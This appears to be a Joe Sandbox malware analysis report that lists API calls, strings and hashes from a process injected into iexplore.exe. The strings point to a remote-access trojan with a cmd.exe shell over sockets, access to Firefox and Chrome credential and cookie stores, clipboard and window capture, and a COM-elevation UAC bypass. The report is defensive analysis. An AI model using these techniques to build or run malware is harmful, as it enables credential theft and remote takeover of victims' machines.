                                                  • Opcode Fuzzy Hash: dcb8bbe3008815659d7ac68a6ea7f78deb902096d49664026298ca84a5559c75
                                                  • Instruction Fuzzy Hash: FE2100A2B003042BD904B6346C09A7FB29FCBC1758F800929ED86973C2FE2CDD0986B1
                                                  APIs
                                                  • socket.WS2_32(?,00000001,00000006), ref: 02D74852
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,02D7530B,?,?,?,00000000,02D7D2DD,?,?,?,?,02D7522E), ref: 02D7488E
                                                    • Part of subcall function 02D7489E: WSAStartup.WS2_32(00000202,00000000), ref: 02D748B3
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEventStartupsocket
                                                  • String ID:
                                                  • API String ID: 1953588214-0
                                                  • Opcode ID: 8b7d48b53beddfa4fc371265ca0c984295b89da66f16e2c2c709f5b0a2798fc9
                                                  • Instruction ID: 73c3f7429bc7f1f08ed2d07d14877fd2dd66fd822119169a77ac11f591dd65f4
                                                  • Opcode Fuzzy Hash: 8b7d48b53beddfa4fc371265ca0c984295b89da66f16e2c2c709f5b0a2798fc9
                                                  • Instruction Fuzzy Hash: 9E017CB0848BD19EEB399F28A489796BFE4AB09304F044D5EF0D687B91D3B5A841CF14
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 02D8BB49
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 02D8BB5C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$ForegroundText
                                                  • String ID:
                                                  • API String ID: 29597999-0
                                                  • Opcode ID: 44f3c9f7b399f6cc00abbbf2b3f08f52103dcc45b781e41fed580bb29050bbd2
                                                  • Instruction ID: 3ce2f772382f28204251551e5cfd951d591279aa1759835b12580e0bdc333997
                                                  • Opcode Fuzzy Hash: 44f3c9f7b399f6cc00abbbf2b3f08f52103dcc45b781e41fed580bb29050bbd2
                                                  • Instruction Fuzzy Hash: 02E04875E4032967EB20A6A49C5DFE5776CD704750F040599BA1CD32C1EEB4AD148BE1
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,02D7EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,02DD60CC,00000003,00000000), ref: 02D7D0B3
                                                  • GetLastError.KERNEL32 ref: 02D7D0BE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateErrorLastMutex
                                                  • String ID:
                                                  • API String ID: 1925916568-0
                                                  • Opcode ID: c101359dec358fd026842b7e4482ca3a5c10edc58788839a326d07ac6f7485ec
                                                  • Instruction ID: aed835c027c2d133ee7d8a43f480c4cc6ec167c43e8ca4cf82bc4bf4e3e71285
                                                  • Opcode Fuzzy Hash: c101359dec358fd026842b7e4482ca3a5c10edc58788839a326d07ac6f7485ec
                                                  • Instruction Fuzzy Hash: 35D012B1A94202DFDF047770A4697AD7755DB84701FA04819F647C57D0DAA48CB04911
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID:
                                                  • API String ID: 176396367-0
                                                  • Opcode ID: 2aa20331b14e1e057a05b5fdd3593d42090c0ac56e3d4257f0b9083ec1202630
                                                  • Instruction ID: 5c1b0fd85acdc7d3e3ef2b649ceb1d22b143633a9c1e0e506aa3cd5f0c8aa0c7
                                                  • Opcode Fuzzy Hash: 2aa20331b14e1e057a05b5fdd3593d42090c0ac56e3d4257f0b9083ec1202630
                                                  • Instruction Fuzzy Hash: 34118C329042099BCB14EF24E8519EEBBB6EF54320F40011AE84696390FF28ED15CFA0
                                                  APIs
                                                  • GetUserNameW.ADVAPI32(?,02D7F25E), ref: 02D8B6D3
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: NameUser
                                                  • String ID:
                                                  • API String ID: 2645101109-0
                                                  • Opcode ID: e6b26f3d1db2a6ee2770f3745ee13f399015fc176f4efdd9ea41f10f3797973d
                                                  • Instruction ID: 633b66bcc01a27e92b28838690bfbcc539a82e2d4ed90d0b8cb7e9af24d28b4b
                                                  • Opcode Fuzzy Hash: e6b26f3d1db2a6ee2770f3745ee13f399015fc176f4efdd9ea41f10f3797973d
                                                  • Instruction Fuzzy Hash: 2301FF7290011DABDB05EBD4DC44EDDB7BDEF44311F104156E405A6294FF746E89CBA4
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 02D748B3
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID:
                                                  • API String ID: 724789610-0
                                                  • Opcode ID: 745a52912d006846caae137716a917d632237680b633eef78c338a64735e50e4
                                                  • Instruction ID: 5fcb6dae79279752d97271baf5e462967e8d3bc7f224f9674b2412d1ccddca10
                                                  • Opcode Fuzzy Hash: 745a52912d006846caae137716a917d632237680b633eef78c338a64735e50e4
                                                  • Instruction Fuzzy Hash: BDD0C92299C6098AEA20A9B4A80F8A4775C8716615F1407AA6CB5C26C6E6501A2CC6AA
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: send
                                                  • String ID:
                                                  • API String ID: 2809346765-0
                                                  • Opcode ID: 06e09c1d451d6fdb56f8d3a3f4b61cf460d20565afd62c6583a1f794ce30322e
                                                  • Instruction ID: 43afb2f9f3464b8291f336d6b685e19f2e6d1cae0d6698bbc95e2ea287674bf7
                                                  • Opcode Fuzzy Hash: 06e09c1d451d6fdb56f8d3a3f4b61cf460d20565afd62c6583a1f794ce30322e
                                                  • Instruction Fuzzy Hash: E5B09279108203FF9A050B60C8588BA7EA6ABC8380F008D0CB5C741330D636C8A0DB21
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 02D756E6
                                                    • Part of subcall function 02D74AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02D74B36
                                                  • __Init_thread_footer.LIBCMT ref: 02D75723
                                                  • CreatePipe.KERNEL32(02DE6CDC,02DE6CC4,02DE6BE8,00000000,02DD60CC,00000000), ref: 02D757B6
                                                  • CreatePipe.KERNEL32(02DE6CC8,02DE6CE4,02DE6BE8,00000000), ref: 02D757CC
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,02DE6BF8,02DE6CCC), ref: 02D7583F
                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 02D75897
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D758BC
                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 02D758E9
                                                    • Part of subcall function 02DA4801: __onexit.LIBCMT ref: 02DA4807
                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,02DE4FA0,02DD60D0,00000062,02DD60B4), ref: 02D759E4
                                                  • Sleep.KERNEL32(00000064,00000062,02DD60B4), ref: 02D759FE
                                                  • TerminateProcess.KERNEL32(00000000), ref: 02D75A17
                                                  • CloseHandle.KERNEL32 ref: 02D75A23
                                                  • CloseHandle.KERNEL32 ref: 02D75A2B
                                                  • CloseHandle.KERNEL32 ref: 02D75A3D
                                                  • CloseHandle.KERNEL32 ref: 02D75A45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                  • String ID: SystemDrive$cmd.exe
                                                  • API String ID: 2994406822-3633465311
                                                  • Opcode ID: ee62b552b93b14e907c70888502590173c10437e9da7f5b28f865662f5208eee
                                                  • Instruction ID: c94c3d44182dee66c4f50f4c1bc44dbf0b903a2cd87fa50b59f26cd5dd0bb025
                                                  • Opcode Fuzzy Hash: ee62b552b93b14e907c70888502590173c10437e9da7f5b28f865662f5208eee
                                                  • Instruction Fuzzy Hash: 2E91A571A84245EFDB05BB34BC54D2E7BAEEB90754F400829F84656390EA69DC18CFB2
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 02D7BBEA
                                                  • FindClose.KERNEL32(00000000), ref: 02D7BC04
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 02D7BD27
                                                  • FindClose.KERNEL32(00000000), ref: 02D7BD4D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                  • API String ID: 1164774033-3681987949
                                                  • Opcode ID: 6214d58cc1082364102cf79f5f2cd4e6a933bd6ba7c635d6bdd9068a0a16f519
                                                  • Instruction ID: cd6034e90262574a82b9b7c59f72847bf2715583bcdb0ce988b8a8cd55ce2a2d
                                                  • Opcode Fuzzy Hash: 6214d58cc1082364102cf79f5f2cd4e6a933bd6ba7c635d6bdd9068a0a16f519
                                                  • Instruction Fuzzy Hash: A0514F3290411A9BDB14FBB1EC65DEDB73AEF10300F60455AE54A622D4FF289E49CEA1
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 02D868FD
                                                  • EmptyClipboard.USER32 ref: 02D8690B
                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 02D8692B
                                                  • GlobalLock.KERNEL32(00000000), ref: 02D86934
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 02D8696A
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 02D86973
                                                  • CloseClipboard.USER32 ref: 02D86990
                                                  • OpenClipboard.USER32 ref: 02D86997
                                                  • GetClipboardData.USER32(0000000D), ref: 02D869A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 02D869B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 02D869B9
                                                  • CloseClipboard.USER32 ref: 02D869BF
                                                    • Part of subcall function 02D74AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02D74B36
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                  • String ID:
                                                  • API String ID: 3520204547-0
                                                  • Opcode ID: da3f67fa740e24ce5eb0ac24cb275cccbfaffe91c762a60d36646db444273910
                                                  • Instruction ID: d5700b56375b416924ec07e082a6214c384dacaf44ef97dbf19f1fea8639c631
                                                  • Opcode Fuzzy Hash: da3f67fa740e24ce5eb0ac24cb275cccbfaffe91c762a60d36646db444273910
                                                  • Instruction Fuzzy Hash: 5A214F72644602ABC714BBB0D86DABE77AAEF94701F500959E946823C0EF348C158A72
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 02D7755C
                                                  • CoGetObject.OLE32(?,00000024,02DD6528,00000000), ref: 02D775BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object_wcslen
                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                  • API String ID: 240030777-3166923314
                                                  • Opcode ID: ac3f68b02e96a5b60b25709bed1d52d55f6eb1ee3e175ca657b4c2c2a7dbe8d6
                                                  • Instruction ID: 4d0ce7556ed3c4cb512cce55ad4ebf2b9449fec7ed46b0e496419fbbbcc5badd
                                                  • Opcode Fuzzy Hash: ac3f68b02e96a5b60b25709bed1d52d55f6eb1ee3e175ca657b4c2c2a7dbe8d6
                                                  • Instruction Fuzzy Hash: 91118671900218ABF710EBA8E854EDEF7BDDB19710F140456E915A2340EB74DE08CAF5
                                                  APIs
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,02DE58F8), ref: 02D8A7EF
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 02D8A83E
                                                  • GetLastError.KERNEL32 ref: 02D8A84C
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 02D8A884
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                  • String ID:
                                                  • API String ID: 3587775597-0
                                                  • Opcode ID: 2e73abe502ae64c726d9722fb85dd37cb7c0a9cf9e6c498719542fe117e24d31
                                                  • Instruction ID: b0bcc945c64e6069a15be8305732148f54d373933e65fa2055c7c3462af7552d
                                                  • Opcode Fuzzy Hash: 2e73abe502ae64c726d9722fb85dd37cb7c0a9cf9e6c498719542fe117e24d31
                                                  • Instruction Fuzzy Hash: AA813C31508301ABD315EB60D8949AFB7A9FF94314F50491EF58692290FF74EE09CFA2
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 02D7C3D6
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 02D7C4A9
                                                  • FindClose.KERNEL32(00000000), ref: 02D7C4B8
                                                  • FindClose.KERNEL32(00000000), ref: 02D7C4E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 1164774033-405221262
                                                  • Opcode ID: bc72ade08dc0cdace13c4b25465a4b2825f7d87444b2b19537d03f45cec2c58d
                                                  • Instruction ID: d9f58d20ff7c34502ad439442937ad1173b1a3c1f05250c3a65d7a52797d2313
                                                  • Opcode Fuzzy Hash: bc72ade08dc0cdace13c4b25465a4b2825f7d87444b2b19537d03f45cec2c58d
                                                  • Instruction Fuzzy Hash: B131523295021A5ADB14F760EC54DFDB779EF10714F50456AE40AA2390FF789D4ACEA0
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,02DE52E8,02DE5300,00000001), ref: 02D8C37D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,02DE52E8,02DE5300,00000001), ref: 02D8C3AD
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,02DE52E8,02DE5300,00000001), ref: 02D8C41F
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,02DE52E8,02DE5300,00000001), ref: 02D8C42C
                                                    • Part of subcall function 02D8C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,02DE52E8,02DE5300,00000001), ref: 02D8C402
                                                  • GetLastError.KERNEL32(?,?,?,?,?,02DE52E8,02DE5300,00000001), ref: 02D8C44D
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,02DE52E8,02DE5300,00000001), ref: 02D8C463
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,02DE52E8,02DE5300,00000001), ref: 02D8C46A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,02DE52E8,02DE5300,00000001), ref: 02D8C473
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                  • String ID:
                                                  • API String ID: 2341273852-0
                                                  • Opcode ID: cb107b5373a2f1edb16f494ca0e24c182b09da4e7a70dee71b7d9445492c456f
                                                  • Instruction ID: 6bacfbfd08afceacd977abc0ec5e9890022a707c4422752b405afb6dc90c975b
                                                  • Opcode Fuzzy Hash: cb107b5373a2f1edb16f494ca0e24c182b09da4e7a70dee71b7d9445492c456f
                                                  • Instruction Fuzzy Hash: 35319EB284021D9ADB24E7B4DC58EEAB3ACEB04300F5405E6E595E2240EB35AEC4CE70
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02D840D8
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02D840E4
                                                    • Part of subcall function 02D74AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02D74B36
                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 02D842A5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D842AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                  • API String ID: 2127411465-314212984
                                                  • Opcode ID: 361a859654e0e9104bc086a9c5ef72bc21d7fe016db7a698f1d5adaf350e1459
                                                  • Instruction ID: 11cd989e749dbf4e768d193f3f2a1450ae50fb5a541f8ef7577f849237bf9da6
                                                  • Opcode Fuzzy Hash: 361a859654e0e9104bc086a9c5ef72bc21d7fe016db7a698f1d5adaf350e1459
                                                  • Instruction Fuzzy Hash: 38B1C672A442016ADA14FB74DC65DBE77AADF91750F40061CE84A973D0FE69CE08CAB2
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 02D7BA89
                                                  • GetLastError.KERNEL32 ref: 02D7BA93
                                                  Strings
                                                  • [Chrome StoredLogins not found], xrefs: 02D7BAAD
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 02D7BA54
                                                  • [Chrome StoredLogins found, cleared!], xrefs: 02D7BAB9
                                                  • UserProfile, xrefs: 02D7BA59
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                  • API String ID: 2018770650-1062637481
                                                  • Opcode ID: 6d175f85a71fc3f99bed367579cc86dc29001ac10af5c80ff5624b2113b15331
                                                  • Instruction ID: dfafe40d8aabe4565fc61a6fd2f723a7d5ee51d7f8e50ca60cd0ce1fb4e59342
                                                  • Opcode Fuzzy Hash: 6d175f85a71fc3f99bed367579cc86dc29001ac10af5c80ff5624b2113b15331
                                                  • Instruction Fuzzy Hash: 95016232A981065A5B08BBB5EC2A8BEB729EA21704F500616D48753384FE598D19CFF2
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 02D8799A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 02D879A1
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02D879B3
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02D879D2
                                                  • GetLastError.KERNEL32 ref: 02D879D8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID: SeShutdownPrivilege
                                                  • API String ID: 3534403312-3733053543
                                                  • Opcode ID: 62bc9a18482b613c5246875deb3f5b40da128800527dd82d649e9f35ad5d9670
                                                  • Instruction ID: c140e7353f4681968617488f4527f876ce2f15194a37b733ab6a19e5422578e9
                                                  • Opcode Fuzzy Hash: 62bc9a18482b613c5246875deb3f5b40da128800527dd82d649e9f35ad5d9670
                                                  • Instruction Fuzzy Hash: 20F03AB188212ABBDB10ABA1EC0DAFFBFBCEF05311F204454B905A1200D6344E14DBF1
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 02D79293
                                                    • Part of subcall function 02D748C8: connect.WS2_32(?,?,?), ref: 02D748E0
                                                    • Part of subcall function 02D74AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02D74B36
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02D7932F
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 02D7938D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 02D793E5
                                                  • FindClose.KERNEL32(00000000), ref: 02D793FC
                                                    • Part of subcall function 02D74E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,02DE4F08,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000,02DE4F08,02D74AC9), ref: 02D74E38
                                                    • Part of subcall function 02D74E26: SetEvent.KERNEL32(?,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000,02DE4F08,02D74AC9), ref: 02D74E43
                                                    • Part of subcall function 02D74E26: CloseHandle.KERNEL32(?,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000,02DE4F08,02D74AC9), ref: 02D74E4C
                                                  • FindClose.KERNEL32(00000000), ref: 02D795F4
                                                    • Part of subcall function 02D74AA1: WaitForSingleObject.KERNEL32(?,00000000,02D745E6,?,?,00000004,?,?,00000004,02D7D2DD,00000000,?), ref: 02D74B47
                                                    • Part of subcall function 02D74AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,02D7D2DD,00000000,?,?,?,?,?,?,02D745E6), ref: 02D74B75
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                  • String ID:
                                                  • API String ID: 1824512719-0
                                                  • Opcode ID: 98b0725533ca8f805ab1fc3b24baff23c9f997f8fd0d492fb473870b6d1e860d
                                                  • Instruction ID: 149bd1175b5f71309a340021204b2b26fdcd2493b6a85ae09650fe8cd869428b
                                                  • Opcode Fuzzy Hash: 98b0725533ca8f805ab1fc3b24baff23c9f997f8fd0d492fb473870b6d1e860d
                                                  • Instruction Fuzzy Hash: 7DB15E329001099ADB15FBA0DD65AEDB77AEF14310F504259E54AA72D0FF389F49CFA0
                                                  APIs
                                                    • Part of subcall function 02D8798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 02D8799A
                                                    • Part of subcall function 02D8798D: OpenProcessToken.ADVAPI32(00000000), ref: 02D879A1
                                                    • Part of subcall function 02D8798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02D879B3
                                                    • Part of subcall function 02D8798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02D879D2
                                                    • Part of subcall function 02D8798D: GetLastError.KERNEL32 ref: 02D879D8
                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 02D86891
                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 02D868A6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D868AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                  • String ID: PowrProf.dll$SetSuspendState
                                                  • API String ID: 1589313981-1420736420
                                                  • Opcode ID: 1463bdbdde8d4240cc5e8a0b3216df4b831aed16c201620de25dc3ae9a45f8a0
                                                  • Instruction ID: 163e53ce609bea8e11f78afdd96dbe983f6c66f5f6e4dc2a3e1b24073d47d85f
                                                  • Opcode Fuzzy Hash: 1463bdbdde8d4240cc5e8a0b3216df4b831aed16c201620de25dc3ae9a45f8a0
                                                  • Instruction Fuzzy Hash: 4A218261A0430156DA14FBB0A8A4ABE636FDF81744F800D59A54A577C4FF69CC09CF72
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,02DC27DB,?,00000000), ref: 02DC2555
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,02DC27DB,?,00000000), ref: 02DC257E
                                                  • GetACP.KERNEL32(?,?,02DC27DB,?,00000000), ref: 02DC2593
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 9e43079b063a473acd457d938c2a8973028ab942d09b6579af6f4fb1dc8c1420
                                                  • Instruction ID: 92454162d7a2e4daf566a3c42b522f70773a4c22d52b443ec30470adb9eb29d0
                                                  • Opcode Fuzzy Hash: 9e43079b063a473acd457d938c2a8973028ab942d09b6579af6f4fb1dc8c1420
                                                  • Instruction Fuzzy Hash: 2721D861A20107A7D734CF54C839BABB3A6EB44B24BB6856CEC49D7314E732DD41C390
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 02D796A5
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 02D7971D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 02D79746
                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 02D7975D
                                                  Memory Dump Source
